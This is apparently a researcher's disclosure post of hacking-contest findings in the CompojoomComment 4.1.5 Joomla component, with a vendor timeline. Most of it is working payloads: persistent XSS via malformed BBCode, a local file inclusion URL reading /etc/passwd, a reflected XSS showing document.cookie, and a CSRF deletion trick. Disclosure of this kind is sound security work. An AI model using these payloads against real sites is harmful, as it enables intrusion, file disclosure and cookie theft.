Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).

Malformed BBCode Persistent XSS, #1

a[img]b[img]c[/img]d[/img]e
a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e

Malformed BBCode Persistent XSS, #2

[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]

Local File Inclusion

?option=com_comment
&no_html=1
&component=../../../../../../../../../../../../etc/passwd%00
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Reflective XSS

?option=com_comment
&no_html=1
&component=<script>alert(document.cookie);</script>
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Administrator Persistent XSS

Name & Title inputs in comment edit aren't sanitized - a double quote in either field will allow for XSS in admin IF the admin edits that comment...

Comment Deletion CSRF

Embedding the "delete comment" URL in an [img] BBCode would result in comment deletion if an authorized admin loaded the page

Timeline

• Vulnerabilities Discovered: 4-9 August 2010
• Vendor Notified: 4-9 August 2010
• Vendor Response: 4-9 August 2010
• Update Available: 9 August 2010
• Disclosure: 1 September 2010